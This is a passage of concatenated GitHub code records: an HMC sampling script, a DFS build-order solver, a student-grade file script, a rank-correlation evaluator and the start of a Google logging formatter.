'/samples/', fpathd + '/accepted/', fpathd + '/probs/', fpathd + '/counts/']:\n try: \n os.makedirs(ff)\n except Exception as e: print(e)\n\n np.save(fpathd + '/samples/%d'%rank, mysamples)\n np.save(fpathd + '/accepted/%d'%rank, accepted)\n np.save(fpathd + '/probs/%d'%rank, probs)\n np.save(fpathd + '/counts/%d'%rank, counts)\n \n if args.gather == 1: \n try:\n mysamples = comm.gather(mysamples, root=0)\n accepted = comm.gather(accepted, root=0)\n probs = comm.gather(probs, root=0)\n counts = comm.gather(counts, root=0)\n except Exception as e:\n print(rank, e)\n comm.Abort(1) ##sys.exit(-1)\n\n if rank == 0:\n mysamples = np.concatenate(mysamples, axis=1)\n accepted = np.concatenate(accepted, axis=1)\n probs = np.concatenate(probs, axis=1)\n counts = np.concatenate(counts, axis=1)\n\n np.save(fpathd + '/samples', mysamples)\n np.save(fpathd + '/accepted', accepted)\n np.save(fpathd + '/probs', probs)\n np.save(fpathd + '/counts', counts)\n\n print('Saved in %s'%fpathd)\n start = time.time()\n #dg.plot_hist(mysamples[::10], fpathd)\n print(time.time() - start)\n\n\n\n#############################\n###Do HMC\n\n\nprint('Step size fid : ', stepsizefid)\n#print('invemtric fid : ', invmetricfid)\nprint('Tint fid : ', Tint)\nprint('Nleapfrog fid : ', Nleapfrogfid)\n\n\nhmc = PyHMC(log_prob, grad_log_prob, invmetricfid)\nif args.olong == 1: hmc_multi = PyHMC_multistep(log_prob, grad_log_prob, invmetricfid)\nif args.olong == 3: hmc_multi = PyHMC_multistep_tries3(log_prob, grad_log_prob, invmetricfid)\n\n\nstepsf = [1, 2, 5, 0.5]\nnsubs = [2, 3, 4]\nfactors = [2, 5,10]\ncostthresh = 200 \n\nfor ss in stepsf:\n\n step_size = stepsizefid*ss\n Nleapfrog = max(1, int(Tint/step_size)) #+ 1\n #if Nleapfrog <= 2: \n # print(\"Only %d steps for this step size \\eps=%0.3f, so skipping\"%(Nleapfrog, step_size))\n # continue\n\n\n print(\"\\nFor step size %0.3f and %d leapfrog steps\\n\"%(step_size, Nleapfrog))\n\n if args.vanilla == 1:\n stepfunc = lambda x: hmc.hmc_step(x, Nleapfrog, step_size)\n mysamplesu, accepted, probs, counts = utils.do_hmc(stepfunc, initstate, nsamples=args.nsamples, burnin=args.burnin)\n mysamples = np.array([[stansamples.constrain_pars(mysamplesu[i, j]) \\\n for i in range(mysamplesu.shape[0])] for j in range(mysamplesu.shape[1])])\n mysamples = mysamples.transpose(1, 0, 2)\n 
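Since the sweep over stepsf holds the integration time roughly constant, halving the step size doubles the leapfrog count. A tiny standalone illustration of the Nleapfrog formula used here, with the script's default Tint and step size:

Tint, stepsizefid = 5.0, 0.01
for ss in (1, 2, 5, 0.5):
    step_size = stepsizefid * ss
    print(ss, step_size, max(1, int(Tint / step_size)))
# -> 500, 250, 100 and 1000 leapfrog steps respectively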
if tnamepath : \n fpathd = fpath + 'step%02d_tint%03d/'%(ss*10, Tint*10)\n else: fpathd = fpath + 'step%02d/'%(ss*10)\n samplesaves(fpathd, mysamples, accepted, probs, counts)\n\n for nsub in nsubs:\n for two_factor in factors:\n if two_factor**(nsub-1) > costthresh: continue\n print(\"\\nFor step size %0.3f and %d leapfrog steps\\n\"%(step_size, Nleapfrog))\n print(\"\\nSubsize with %d upto %d times\\n\"%(two_factor, nsub))\n try:\n stepfunc_multi = lambda x: hmc_multi.multi_step(nsub, x, Nleapfrog, step_size, two_factor)\n mysamplesu, accepted, probs, counts = utils.do_hmc(stepfunc_multi, initstate, nsamples=args.nsamples, burnin=args.burnin)\n mysamples = np.array([[stansamples.constrain_pars(mysamplesu[i, j]) \\\n for i in range(mysamplesu.shape[0])] for j in range(mysamplesu.shape[1])])\n mysamples = mysamples.transpose(1, 0, 2)\n if tnamepath: \n fpathd = fpath + 'step%02d_tint%03d_fac%02d_nsub%d/'%(ss*10, Tint*10, two_factor, nsub)\n else: fpathd = fpath + 'step%02d_fac%02d_nsub%d/'%(ss*10, two_factor, nsub)\n samplesaves(fpathd, mysamples, accepted, probs, counts)\n except: pass\n","repo_name":"modichirag/hmc","sub_path":"scripts_old/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":9266,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"73312918826","text":"from collections import defaultdict\n\ndef find_build_order(projects, dependencies):\n visited, order = set(), []\n graph = build_graph(dependencies)\n for project in projects:\n if project not in visited:\n visited.add(project)\n recursion_stack = set()\n if not dfs(graph, project, visited, order, recursion_stack):\n return None\n return list(reversed(order))\n\n\ndef dfs(graph, project, visited, order, recursion_stack):\n recursion_stack.add(project)\n for nhbr in graph[project]:\n if nhbr in recursion_stack:\n return False\n if nhbr not in visited:\n visited.add(nhbr)\n if not dfs(graph, nhbr, visited, order, recursion_stack):\n return False\n order.append(project)\n recursion_stack.remove(project)\n return True\n\n\ndef build_graph(dependencies):\n graph = defaultdict(set)\n for edge in dependencies:\n start, end = edge[0], edge[1]\n graph[start].add(end)\n return graph\n\n\nproj = [\"f\", \"d\", \"a\", \"h\", \"g\", \"k\", \"i\", \"z\"]\ndep = [\n [\"f\", \"d\"],\n [\"f\", \"a\"],\n [\"d\", \"a\"],\n [\"g\", \"a\"],\n [\"a\", \"h\"],\n [\"g\", \"h\"],\n [\"k\", \"i\"],\n [\"z\", \"g\"],\n [\"h\", \"f\"]\n]\n\nprint(find_build_order(proj, dep))\n","repo_name":"gan3i/CTCI-Python","sub_path":"Revision/TreeAndGraph/BuildOrder_4.7/build_order_4.7_dfs.py","file_name":"build_order_4.7_dfs.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7243875080","text":"def escrever(nome, txt):\r\n arquivo = open(nome, 'a')\r\n arquivo.writelines(txt)\r\n arquivo.close()\r\n\r\n\r\n\r\ndef media_nota(nome_arquivo):\r\n arquivo= open(nome_arquivo, 'r')\r\n aluno_nota = arquivo.read()\r\n #print(aluno_nota)\r\n aluno_nota = aluno_nota.split('\\n')\r\n #print(aluno_nota)\r\n lista_media=[]\r\n for x in aluno_nota:\r\n lista_notas = x.split(',')\r\n aluno = lista_notas[0]\r\n lista_notas.pop(0)\r\n media = lambda notas: sum([int(i) for i in notas])/4\r\n print(media(lista_notas))\r\n lista_media.append({aluno:media(lista_notas)})\r\n return lista_media\r\n\r\n \r\ndef copia(nome):\r\n import shutil\r\n shutil.copy(nome, 
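One detail worth noting in the build-order example above: the dependency list contains the cycle f -> a -> h -> f (via ["f", "a"], ["a", "h"] and ["h", "f"]), so find_build_order correctly returns None for it. A sketch, assuming the definitions above are in scope:

assert find_build_order(proj, dep) is None           # cyclic as given
acyclic_dep = [edge for edge in dep if edge != ["h", "f"]]
assert find_build_order(proj, acyclic_dep) is not None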
'C:/Users/SAMSUNG/Documents/')\r\n\r\nif __name__ =='__main__':\r\n\r\n '''\r\n lista_media = media_nota('Notas.txt')\r\n print(lista_media)\r\n '''\r\n copia('Notas.txt')","repo_name":"Augusto0192/Python_Basico_Jupter","sub_path":"python/py_treinos/treino_1/Manipulação_arquivos.py","file_name":"Manipulação_arquivos.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"24426204251","text":"# from scipy import stats\n# import sys\n#\n#\n# def rankCorr(x, y):\n# rho, pval = stats.spearmanr(x, y)\n# tau, pval = stats.kendalltau(x, y)\n# print('S-rho = {:.4f}, K-tau = {:.4f}'.format(rho, tau))\n#\n#\n# if len(sys.argv) < 2:\n# print('usage: python rankcorr.py <values_file>')\n# sys.exit(0)\n#\n# values_file = open(sys.argv[1], \"r\")\n# lines = values_file.readlines()\n#\n# col1 = []\n# col3 = []\n# col2 = []\n# col4 = []\n# for line in lines:\n# tokens = line.split('\\t')\n# col1.append(tokens[0])\n# col3.append(tokens[2])\n# # col2.append(tokens[1])\n# # col4.append(tokens[3])\n#\n# values_file.close()\n#\n# rankCorr(col1, col3)\n\n\nfrom scipy import stats\nimport sys, math\n\n\ndef reportRankCorr(x, y):\n rho, pval = stats.spearmanr(x, y)\n tau, pval = stats.kendalltau(x, y)\n print('S-rho = {:.4f}, K-tau = {:.4f}'.format(rho, tau))\n\n #also compute the avg shift in ranks\n i = 1\n shift = 0\n for x_i in x:\n j = y.index(x_i)\n shift += abs(i-j)\n i+= 1\n print('avg rank shift = {:.4f}'.format(shift/len(x)))\n\n\nif len(sys.argv) < 2:\n print('usage: python evalrankcorr.py <values_file>')\n sys.exit(0)\nvalues_file = open(sys.argv[1], \"r\")\nlines = values_file.readlines()\nx = []\ny = []\nfor line in lines:\n tokens = line.split()\n # parse as floats so the rank correlations are computed numerically,\n # not on lexicographically ordered strings\n x.append(float(tokens[0]))\n y.append(float(tokens[1]))\nvalues_file.close()\nreportRankCorr(x, y)","repo_name":"suchanadatta/QPP-NeuralIR-Models","sub_path":"QPP/evalrankcorr.py","file_name":"evalrankcorr.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"13897076129","text":"import datetime\nimport logging\nfrom logging import Formatter\nimport os\n\n\nclass GoogleFormatter(Formatter):\n\n \"\"\"Logging Formatter which can be used to output logs to stderr in a format\n that can be parsed by google logging\n\n Note that any datefmt passed in to the setup will be ignored as this needs\n to be in a specific format to be recognised by google.\n \"\"\"\n\n levels = {\n logging.DEBUG: \"D\",\n logging.INFO: 
